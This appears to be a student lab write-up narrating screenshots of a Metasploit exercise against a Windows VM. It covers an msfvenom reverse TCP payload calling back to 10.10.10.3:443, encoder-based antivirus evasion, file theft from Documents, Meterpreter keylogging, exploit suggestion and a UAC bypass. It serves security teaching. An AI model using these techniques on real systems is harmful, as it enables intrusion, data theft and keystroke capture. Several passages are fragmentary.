Professional Documents
Culture Documents
Presentati
Presentati
Task3.3
The screenshot illustrates the creation of a reverse TCP connection payload using the
msfvenom tool, which is a component of the Metasploit framework. The payload is
designed to establish a secure connection back to the attacker’s server, enabling the
attacker to execute commands remotely on the infected machine.
In the highlighted section, we see the command used to generate an executable file (.exe)
named "Group3.exe". This file is configured to connect back to the attacker's host on IP
"10.10.10.3" through port 443.
the output of the command ls -la shows various files in the directory, including the newly
created "Group3.exe". Its presence is confirmed along with details such as file size and
timestamp.
Task3.4
This slide illustrates a more advanced technique used in cybersecurity, specifically within
penetration testing, to evade antivirus detection—this time focusing on the use of
encoders from the Metasploit framework.
1. *Command Overview*:
- The initial command msfvenom -l encoders displays a list of available encoders in
Metasploit. Encoders are used to transform payload data to make it unrecognizable by
antivirus systems like Windows Defender.
2. *Selecting an Encoder*:
encoder feedback, is chosen. This encoder is particularly effective because it generates a
unique version of the payload each time it is used, helping to bypass signature-based
detection systems.
4. *Output*:
- The encoder successfully alters the payload multiple times, as shown by the different
sizes of the payload after each iteration. This process dramatically increases the
likelihood that the executable, now named "Group3-2.exe", will evade antivirus
detection.
5. *File Verification*:
- The ls -la command output confirms the presence of the newly created "Group3-
2.exe" in the directory, alongside other files.
Task4.5
In this task we are looking at how to set up a listener for a reverse TCP payload using the
Metasploit Framework,
3.
The attempt to download the executable results in a virus detection alert by Windows
Defender, indicating that the file has been recognized as malicious. This illustrates the
antivirus system’s effectiveness in real-time threat detection and prevention, even when
actions are initiated by a standard user.
Task4.7
In this task
1. **: A non-admin user attempts to run an executable named "Group3.exe" which is
identified as a potentially harmful file. A Windows SmartScreen warning appears,
indicating that the file's safety cannot be verified due to an inability to reach the
SmartScreen service, presenting the user with options to either run or not run the file.
In the second screenshot
*Metasploit Configuration*:, Metasploit's Multi Handler is configured to listen for
incoming connections from the reverse TCP payload. The payload details shown
(windows/meterpreter/reverse_tcp) specify that upon execution, the malware will attempt
to establish a connection back to the attacker’s specified IP (10.10.10.3) and port (443).
4. *Successful Connection*: The final part of the image shows that despite the warning,
the executable was likely run, and a Meterpreter session was successfully opened. This
means the malware executed, bypassed the local defenses (partly because SmartScreen
could not be reached), and established a reverse TCP connection to the attacker's
machine, allowing remote control over the victim's computer.
Task 4.8
In this task
1.: session begins with navigation commands (pwd and cd) to confirm the current
working directory on the victim's machine, which is located at the root of the C: drive.
Task 4.9
The image showcases a process where files from the "Documents" folder of a Windows
10 system are being downloaded to a Kali Linux system using Meterpreter, a common
payload within the Metasploit framework for remote system access.
We navigates to the "Documents" directory using command line (cd command), and then
lists the contents using the dir command, revealing the files and folders present.
After that
- The Meterpreter command download Documents is used to transfer the entire contents
of the "Documents" directory to the Kali Linux system.
- The output shows the progress of each file as it is downloaded. Specific files
mentioned "Group3", and "Group3.txt".
Task 4.12
This task demonstrates the use of a keystroke logger implemented through Meterpreter.
2. *Dumping Keystrokes*:
- The keyscan_dump command is then used to display the captured keystrokes. This
results in the output "HELLO THIS IS GROUP3", indicating the text that was typed
during the logging session.
After that
4. *Downloading the Keystroke File*:
"keystroke.txt" is downloaded to the Kali Linux system using the download command,
specifically targeting the file's location on the desktop of the Windows machine.
5. *Verification of Download*:
- The final part of the image shows the Kali Linux file system with the "keystroke.txt"
file successfully transferred,
Task 5.13
This task is basically about the use of Meterpreter to identify vulnerable services on a
Windows virtual machine (VM) using tools available on a Kali Linux system.
1. *Reverse TCP Handler*: establishes a connection with the target Windows VM.
After that
- The command run post/multi/recon/local_exploit_suggester This Metasploit module
scans the compromised system to identify potential local vulnerabilities that could be
exploited further.
- The system collects data and checks for applicable vulnerabilities.
Task 5.14
This Metasploit module used to identify potential local exploits on a Windows machine.
This particular tool, known as the "local_exploit_suggester," checks the target system for
vulnerabilities that could potentially be exploited.
1. *List of Exploits*: The output shows a list of various exploits along with their status
regarding the target's vulnerability to each exploit.
There is
3. *Specific Exploits*: on The top entry in the list, "is marked as "Yes" for potentially
vulnerable and "The target appears to be vulnerable"
Task 5.15
2. *Exploit Execution*:
- The exploit is executed (run), and the process begins with the starting of a reverse
TCP handler on the specified local host and port.
- The exploit successfully bypasses UAC, as indicated by the text stating UAC is set to
Default and the confirmation of continuing under the assumption of being part of the
Administrators group.
3. *Result of Exploit*:
- After execution, the payload delivers a new Meterpreter session with elevated
privileges, evidenced by session 2 being opened.
- Commands like pwd (print working directory) show the session is operating from the
System32 directory, and location typically restricted to administrative users.
- command sysinfo confirms the system details, including the architecture and
operating system version.